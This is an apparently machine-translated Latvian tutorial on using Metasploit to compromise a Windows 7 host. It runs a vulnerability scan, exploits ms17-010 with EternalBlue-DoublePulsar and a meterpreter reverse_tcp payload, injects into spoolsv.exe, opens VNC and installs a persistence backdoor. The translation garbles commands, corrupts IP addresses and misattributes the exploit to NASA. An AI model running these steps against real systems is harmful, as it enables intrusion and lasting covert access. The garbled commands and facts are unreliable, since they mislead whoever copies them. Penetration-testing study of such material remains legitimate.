metasploit

Metasploit apmācība

Metasploit apmācība

Tā kā mēs esam apsprieduši labāko 25 labāko KALI LINUX rīku un sarakstā vispirms ievietojām METASPLOIT, tagad apspriedīsimies un uzzināsim par METASPLOIT. Mēs iesakām jums iepazīties ar Metasploit.

Metasploit sākotnēji izveidoja H. D Mūrs 2003. gadā, līdz 2009. gada 21. oktobrī to iegādājās un tālāk attīstīja Rapid7. Metasploit-framework ir pilnībā uzrakstīts, izmantojot Ruby, un tā ir standarta pakete, kas instalēta Kali Linux sistēmā (un arī gandrīz visās Penetration Testing OS, es domāju). Tas ir hakeru vai iespiešanās testētāju iecienīts komplekts, lai izpētītu drošības ievainojamības, izstrādātu un izpildītu mērķu izmantošanu, kā arī citu drošības attīstību.

Metasploit nāk ar vairākiem izdevumiem, kas parasti ir sadalīti divās kategorijās: bezmaksas versija un maksas versija. Bezmaksas versijas: Metasploit Framework Community Edition (CLI balstīta saskarne) un Armitage (GUI balstīta saskarne). Apmaksātās versijas: Metasploit Express, Metasploit Pro un Cobalt Strike (tas ir līdzīgs Armitage, ko nodrošina Strategic Cyber ​​LLC).

Metasploit ļauj lietotājiem izveidot (vai attīstīt) savu izmantošanas kodu, taču neuztraucieties, ja nezināt, kā kodēt, Metasploit ir tik daudz moduļu, un tie tiek pastāvīgi atjaunināti. Pašlaik Metasploit ir vairāk nekā 1600 ekspluatācijas un 500 lietderīgās kravas. Vienkāršs veids, kā saprast, kas ir ekspluatācija un lietderīgā slodze, ir būtībā tas, kā uzbrucējs nodrošina lietderīgo slodzi, izmantojot mērķa sistēmas ievainojamības atveri.  Kad uzbrucējs ir palaidis ekspluatāciju, kas satur lietderīgo slodzi pret neaizsargāto mērķi, pēc tam izvietotā lietderīgā slodze (lietderīgā slodze, ko izmanto, lai atkal izveidotu savienojumu ar uzbrucēju, lai iegūtu attālu piekļuvi mērķa sistēmai), šajā posmā ekspluatācija tiek veikta un kļūst neatbilstoša.

"Metasploit nav hakeru tūlītējs rīks, tas ir nenormāls ietvars"

Šis Metasploit raksts ir par iespiešanās pārbaudes veikšanu mērķa sistēmai, izmantojot šādu plūsmu:


SAGATAVOŠANA

Pārliecinieties, ka mūsu Kali Linux ir jaunākā atjauninātā versija. Katrā atjauninājumā būs uzlabojumi. Palaidiet šādas komandas:

~ # apt atjauninājums
~ # apt jauninājums -y
~ # apt dist-upgrade -y

Kad mūsu mašīna ir atjaunināta, tagad sāksim ar metasploit konsoles iedarbināšanu. Terminālā ierakstiet:

~ # msfconsole

Jums arī nepieciešams jebkurš teksta redaktors Gedit vai Leafpad, lai savāktu informāciju, pirms mēs apkopojam uzbrukumu. Pirmkārt, identificējiet bezvadu saskarnes, maršrutētāja IP un tīkla maskas IP adresi.

Pamatojoties uz iepriekš sniegto informāciju, mēs atzīmējam WLAN1 un maršrutētāja IP adresi un tīkla masku. Tātad piezīmei vajadzētu izskatīties šādi:

Uzbrucēja IP (LHOST): 192.168. lpp.1.56
Vārtejas / maršrutētāja IP: 192.168. lpp.1.1
Tīkla maska: 255.255.255.0 (/ 24)


1. SOLIS: IESPĒJAMĪBAS SKENĒŠANA

Pēc tam metasploit konsolē vispirms tiek apkopota informācija, piemēram, mērķa IP adrese, operētājsistēma, atvērtie porti un ievainojamība. Metasploit ļauj mums palaist NMap tieši no konsoles. Pamatojoties uz iepriekš minēto informāciju, izpildiet šo komandu, lai veiktu mūsu informācijas vākšanas uzdevumu.

msf> nmap -v 192.168. lpp.1.1/24 --skripts vuln -Pn -O

No iepriekš minētās komandas mēs saņēmām rezultātu zemāk.

Mēs saņēmām neaizsargātu mērķi, kurā darbojas Windows operētājsistēma, un neaizsargātais atrodas SMBv1 pakalpojumā. Tātad, pievienojiet piezīmei.

Mērķa IP (RHOST): 192.168. lpp.1.57
Ievainojamība: attālās koda izpildes ievainojamība Microsoft SMBv1 serveros (ms17-010)


2. SOLIS: NEVARAMĪBAS NOVĒRTĒJUMS

Tagad mēs zinām mērķi un tā neaizsargātību. Ļauj pārbaudīt metasploit konsoles ievainojamību

Tagad mēs zinām mērķi un tā neaizsargātību. Ļauj pārbaudīt metasploit konsoles ievainojamību, izmantojot smb_scanner palīgmoduli. Palaidiet šādu komandu:

msf> izmantot papildu / skeneri / smb / smb_ms17_010
msf auxiliary (smb_ms17_010)> iestatīt RHOSTS [mērķa IP]
msf auxiliary (smb_ms17_010)> palaist

Metasploit ir pārliecināts par ievainojamību, un tas parāda precīzu Windows OS Edition. Pievienot piezīmei:

Mērķa OS: Windows 7 Ultimate 7600


3. SOLIS: IZMANTOŠANA

Par laimi, metasploit nav izmantošanas moduļa, kas saistīts ar šo ievainojamību. Bet neuztraucieties, ka ārpusē ir kāds puisis un viņš uzrakstīja izmantošanas kodu. Izmantošana ir pazīstama, jo tā ir NASA ierosināta, un to sauc par EternalBlue-DoublePulsar. Jūs varat to paķert no šejienes, vai arī sekojiet tālāk sniegtajam mācību videoklipam, lai instalētu izmantošanas kodu savā metasploit sistēmā.

Kad esat sekojis līdzi iepriekš norādītajam ceļvedim, (pārliecinieties, vai ceļš ir tāds pats kā apmācība). Tagad jūs esat gatavs izmantot mērķi. Palaidiet šādas komandas:

izmantojiet exploit / windows / smb / eternalblue_doublepulsar
iestatīt lietderīgās slodzes logus / meterpreter / reverse_tcp
iestatīt spoles PROCESSINJECT.exe
iestatīt RHOST 192.168. lpp.1.57
iestatīt LHOST 192.168. lpp.1.56

Izmantot

Boom ... Izmantošana izdodas, mēs saņēmām skaitītāja sesiju. Kā jau minēju iepriekš, pēc izlaišanas palaišanas tā izvietos lietderīgo slodzi, kas šeit, mēs izmantojām, ir Windows /skaitītājs/ reverse_tcp.


4. SOLIS: TĀLPIEEJAS IEGŪŠANA

Ļauj izpētīt pieejamākas komandas, ievadiet '?'(bez jautājuma zīmes) un skatiet uzskaitītās pieejamās komandas. The Stdapi, sistēmas komandas ir:

Lai skatītu vairāk informācijas par mērķa sistēmu, izmantojiet 'sysinfo'komandu. Rezultātam vajadzētu izskatīties šādi.

Tā kā mēs iepriekš injicējam sistēmas procesu (spoolsv.exe), mēs saņēmām sistēmas privilēģiju. Mums pieder mērķis. Mēs varam daudz paveikt ar komandu mērķim. Piemēram, mēs varētu palaist RDP vai vienkārši iestatīt VNC tālvadību. Lai palaistu VNC pakalpojumu, ievadiet komandu:

~ # palaist vnc

Rezultātam jābūt mērķa mašīnas darbvirsmai, tas izskatās šādi.

Vissvarīgākā daļa ir aizmugures durvju izveide, tāpēc ikreiz, kad mērķis tiek atvienots no mūsu mašīnas, mērķa mašīna mēģinās atkal savienoties ar mums. Backdooring tiek izmantots, lai uzturētu piekļuvi, tas ir tāpat kā makšķerēšana. Pēc tam, kad esat ieguvis zivis, jūs parasti nemetīsit zivis pie ūdens? Jūs vēlaties kaut ko darīt ar zivīm, neatkarīgi no tā, vai saglabāt to ledusskapī turpmākajām darbībām, piemēram, vārīšanai, vai pārdot par naudu.

Skaitītājam ir šī neatlaidīgā aizvēršanas funkcija. Palaidiet šo komandu un apskatiet pieejamos parametrus un argumentus.

skaitītājs> palaist neatlaidību -h

Ja šis novecojušais skripts jums nepatīk, jaunākais noturības modulis atrodas zem post / windows / manage / persistence_exe. To varat izpētīt pats.

Metasploit ir milzīgs, tas nav tikai instruments, tas ir ietvars, uzskatām, ka tam ir vairāk nekā 1600 izmantojumu un apmēram 500 lietderīgās kravas. Viens raksts ir piemērots tikai vispārējam lietojumam vai idejai. Bet jūs esat uzzinājis tik daudz no šī raksta.

"Jo vairāk jūs sekojat uzbrukuma plūsmai, jo vairāk jums ir bez piepūles izaicinājums.”

Bezmaksas un atvērtā koda spēļu dzinēji Linux spēļu izstrādei
Šis raksts aptvers bezmaksas un atvērtā koda spēļu motoru sarakstu, kurus var izmantot, lai izstrādātu 2D un 3D spēles Linux. Šādu spēļu dzinēju ir da...
Tomb Raider for Linux apmācība
Tomb Raider ēna ir divpadsmitais papildinājums Tomb Raider sērijai - darbības piedzīvojumu spēļu franšīzei, kuru izveidoja Eidos Montreal. Spēli gan k...
Kā palielināt FPS Linux?
FPS apzīmē Kadri sekundē. FPS uzdevums ir izmērīt kadru ātrumu video atskaņošanā vai spēļu izrādēs. Vienkāršos vārdos nepārtrauktu pilnekrāna attēlu s...